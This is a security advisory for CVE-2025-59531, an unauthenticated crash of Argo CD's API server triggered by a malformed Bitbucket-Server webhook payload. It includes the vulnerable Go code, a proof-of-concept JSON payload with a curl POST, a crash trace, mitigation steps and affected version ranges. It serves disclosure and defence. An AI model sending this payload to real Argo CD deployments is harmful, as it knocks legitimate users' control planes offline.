ghsa-f9gq-prrc-hrhc
Vulnerability from github
Summary
Unpatched Argo CD versions are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients.
With the default configuration, no webhook.bitbucketserver.secret set, Argo CD’s /api/webhook endpoint will crash the entire argocd-server process when it receives a Bitbucket-Server push event whose JSON field repository.links.clone is anything other than an array.
A single unauthenticated curl request can push the control-plane into CrashLoopBackOff; repeating the request on each replica causes a complete outage of the API.
Details
```go // webhook.go (Bitbucket-Server branch in affectedRevisionInfo)
for _, l := range payload.Repository.Links["clone"].([]any) { // <- unsafe cast link := l.(map[string]any) ... } ```
If links.clone is a string, number, object, or null, the first type assertion panics: interface conversion: interface {} is string, not []interface {}
The worker goroutine created by startWorkerPool lacks a recover, so the panic terminates the whole binary.
PoC
Save as payload-panic.json - note the non-array links.clone.
json
{
"eventKey": "repo:refs_changed",
"repository": {
"name": "guestbook",
"fullName": "APP/guestbook",
"links": { "clone": "boom" }
},
"changes": [ { "ref": { "id": "refs/heads/master" } } ]
}
shell
curl -k -X POST https://argocd.example.com/api/webhook \
-H 'X-Event-Key: repo:refs_changed' \
-H 'Content-Type: application/json' \
--data-binary @payload-panic.json
Observed crash (argocd-server restart):
panic: interface conversion: interface {} is string, not []interface {}
goroutine 192 [running]:
github.com/argoproj/argo-cd/v3/server/webhook.affectedRevisionInfo
webhook.go:209 +0x1218
...
Mitigation
If you use Bitbucket Server and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.
If you do not use Bitbucket Server, you can set the webhook secret to a long, random value to effectively disable webhook handling for Bitbucket Server payloads.
diff
apiVersion: v1
kind: Secret
metadata:
name: argocd-secret
type: Opaque
data:
+ webhook.bitbucketserver.secret: <your base64-encoded secret here>
For more information
- Open an issue in the Argo CD issue tracker or discussions
- Join us on Slack in channel #argo-cd
Credits
Discovered by Jakub Ciolek at AlphaSense.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd"
},
"ranges": [
{
"events": [
{
"introduced": "1.2.0"
},
{
"last_affected": "1.8.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.14.19"
},
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v2"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0-rc1"
},
{
"fixed": "2.14.20"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v3"
},
"ranges": [
{
"events": [
{
"introduced": "3.2.0-rc1"
},
{
"fixed": "3.2.0-rc2"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"3.2.0-rc1"
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.1.7"
},
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v3"
},
"ranges": [
{
"events": [
{
"introduced": "3.1.0-rc1"
},
{
"fixed": "3.1.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.0.18"
},
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v3"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0-rc1"
},
{
"fixed": "3.0.19"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-59531"
],
"database_specific": {
"cwe_ids": [
"CWE-703"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-30T18:11:59Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nUnpatched Argo CD versions are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients. \n\nWith the default configuration, no `webhook.bitbucketserver.secret` set, Argo CD\u2019s /api/webhook endpoint will crash the entire argocd-server process when it receives a Bitbucket-Server push event whose JSON field `repository.links.clone` is anything other than an array.\n\nA single unauthenticated curl request can push the control-plane into CrashLoopBackOff; repeating the request on each replica causes a complete outage of the API.\n\n### Details\n```go\n// webhook.go (Bitbucket-Server branch in affectedRevisionInfo)\n\nfor _, l := range payload.Repository.Links[\"clone\"].([]any) { // \u003c- unsafe cast\n link := l.(map[string]any)\n ...\n}\n```\n\nIf links.clone is a string, number, object, or null, the first type assertion panics:\ninterface conversion: interface {} is string, not []interface {}\n\nThe worker goroutine created by startWorkerPool lacks a recover, so the panic terminates the whole binary.\n\n### PoC\n\nSave as payload-panic.json - note the non-array links.clone.\n\n```json\n{\n \"eventKey\": \"repo:refs_changed\",\n \"repository\": {\n \"name\": \"guestbook\",\n \"fullName\": \"APP/guestbook\",\n \"links\": { \"clone\": \"boom\" }\n },\n \"changes\": [ { \"ref\": { \"id\": \"refs/heads/master\" } } ]\n}\n```\n\n```shell\ncurl -k -X POST https://argocd.example.com/api/webhook \\\n -H \u0027X-Event-Key: repo:refs_changed\u0027 \\\n -H \u0027Content-Type: application/json\u0027 \\\n --data-binary @payload-panic.json\n```\n\nObserved crash (argocd-server restart):\n\n```\npanic: interface conversion: interface {} is string, not []interface {}\ngoroutine 192 [running]:\ngithub.com/argoproj/argo-cd/v3/server/webhook.affectedRevisionInfo\n webhook.go:209 +0x1218\n...\n```\n\n### Mitigation\n\nIf you use Bitbucket Server and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.\n\nIf you do not use Bitbucket Server, you can set the webhook secret to a long, random value to effectively disable webhook handling for Bitbucket Server payloads.\n\n```diff\napiVersion: v1\nkind: Secret\nmetadata:\n name: argocd-secret\ntype: Opaque\ndata:\n+ webhook.bitbucketserver.secret: \u003cyour base64-encoded secret here\u003e\n```\n\n### For more information\n\n* Open an issue in [the Argo CD issue tracker](https://github.com/argoproj/argo-cd/issues) or [discussions](https://github.com/argoproj/argo-cd/discussions)\n* Join us on [Slack](https://argoproj.github.io/community/join-slack) in channel #argo-cd\n\n### Credits\n\nDiscovered by Jakub Ciolek at AlphaSense.",
"id": "GHSA-f9gq-prrc-hrhc",
"modified": "2025-09-30T18:11:59Z",
"published": "2025-09-30T18:11:59Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-f9gq-prrc-hrhc"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-cd/commit/5c466a4e39802e059e75c0008ae7b7b8e842538f"
},
{
"type": "PACKAGE",
"url": "https://github.com/argoproj/argo-cd"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Unauthenticated argocd-server panic via a malicious Bitbucket-Server webhook payload"
}
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.